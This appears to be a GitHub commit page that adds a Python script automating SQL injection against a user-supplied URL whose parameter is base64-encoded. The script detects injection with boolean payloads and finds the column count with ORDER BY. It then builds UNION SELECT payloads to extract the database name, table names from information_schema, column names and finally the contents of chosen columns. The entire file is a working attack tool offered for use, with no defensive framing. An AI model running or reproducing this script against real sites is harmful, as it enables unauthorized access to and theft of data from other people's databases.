Skip to content

Commit 7e9e942

Browse files
jiushilljiushill
authored
Add files via upload
1 parent 34609a0 commit 7e9e942

1 file changed

Lines changed: 72 additions & 0 deletions

File tree

base64 _injection.py

Lines changed: 72 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,72 @@
1+
import requests
2+
import base64
3+
import binascii
4+
def sql_injection():
5+
uc=input('Please url:')
6+
ids=input('id:')
7+
payload=base64.b64encode(bytes('{} and 1=1'.format(ids),encoding='utf-8'))
8+
payload2=base64.b64encode(bytes('{} and 1=2'.format(ids),encoding='utf-8'))
9+
payload3=base64.b64encode(bytes('{} order by 1'.format(ids),encoding='utf-8'))
10+
urls='{}'.format(uc)
11+
headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'}
12+
rqt=requests.get(url=urls+bytes.decode(payload),headers=headers)
13+
rqt2=requests.get(url=urls + bytes.decode(payload2), headers=headers)
14+
if rqt.text!=rqt2.text:
15+
print('[+] There is SQL injection.')
16+
rqt3=requests.get(url=urls+bytes.decode(payload3),headers=headers)
17+
if rqt.text==rqt3.text:
18+
print('[+] Try running fields')
19+
for i in range(1,101):
20+
payload3=base64.b64encode(bytes('{} order by {}'.format(ids,i),encoding='utf-8'))
21+
rqt3=requests.get(url=urls+bytes.decode(payload3),headers=headers)
22+
if rqt3.text!=rqt.text:
23+
global field
24+
field=i-1
25+
print('[+] field:{}'.format(i-1))
26+
payload3=base64.b64encode(bytes('{} order by {}'.format(ids,field), encoding='utf-8'))
27+
print('[+] payload 3:{}'.format(bytes.decode(base64.b64decode(payload3))))
28+
break
29+
30+
if field!='':
31+
xj=open('sqldk.txt','w')
32+
xj.close()
33+
for u in range(1,field+1):
34+
print(','+str(u),end='',file=open('sqldk.txt','a'))
35+
with open('sqldk.txt','r') as p:
36+
reads=p.read().replace(',1','1')
37+
payload4=base64.b64encode(bytes('0 union select {}'.format(reads),encoding='utf-8'))
38+
print('[+] obtain payload 4:',bytes.decode(base64.b64decode(payload4)))
39+
rqt4=requests.get(url=urls+bytes.decode(payload4),headers=headers)
40+
print('[+] Open URL to manually locate the display:',rqt4.url)
41+
user=input('display:')
42+
print('[+] The number of digits you enter is:',user)
43+
payload4=bytes.decode(base64.b64decode(payload4)).replace(user,'database()')
44+
rqt5=requests.get(url=urls+bytes.decode(base64.b64encode(bytes(payload4,encoding='utf-8'))),headers=headers)
45+
print('[+] Manually open the URL to get the database name:',rqt5.url)
46+
user2=input('database:')
47+
js=binascii.hexlify(bytes(user2,encoding='utf-8'))
48+
js='0x{}'.format(bytes.decode(js))
49+
payload5=base64.b64encode(bytes(payload4.replace('database()','group_concat(table_name)')+' '+'from information_schema.tables where table_schema={}'.format(js),encoding='utf-8'))
50+
rqt6=requests.get(url=urls+bytes.decode(payload5),headers=headers)
51+
if rqt6.status_code==200:
52+
print('[+] Open the URL input field:',rqt6.url)
53+
user3=input('table_name:')
54+
payload6=bytes.decode(base64.b64decode(payload5)).replace('table_name','column_name').replace('tables','columns')+' and table_name={}'.format('0x'+bytes.decode(binascii.hexlify(bytes(user3,encoding='utf-8'))))
55+
payload6=base64.b64encode(bytes(payload6,encoding='utf-8'))
56+
rqt7=requests.get(url=urls+bytes.decode(payload6),headers=headers)
57+
if rqt7.status_code==200:
58+
print('[+] Open URL input field name:',rqt7.url)
59+
print('[+] If there are multiple field names, separate them')
60+
user4=input('column_name:')
61+
payload7=base64.b64encode(bytes('0 union select '+reads.replace(user,'group_concat({})'.format(user4))+' from {}'.format(user3),encoding='utf-8'))
62+
rqt8=requests.get(url=urls+bytes.decode(payload7),headers=headers)
63+
if rqt8.status_code==200:
64+
print('[+] Completed injection:',rqt8.url)
65+
66+
67+
68+
else:
69+
print('[-] No SQL injection exists.')
70+
exit()
71+
if __name__ == '__main__':
72+
sql_injection()

0 commit comments

Comments
 (0)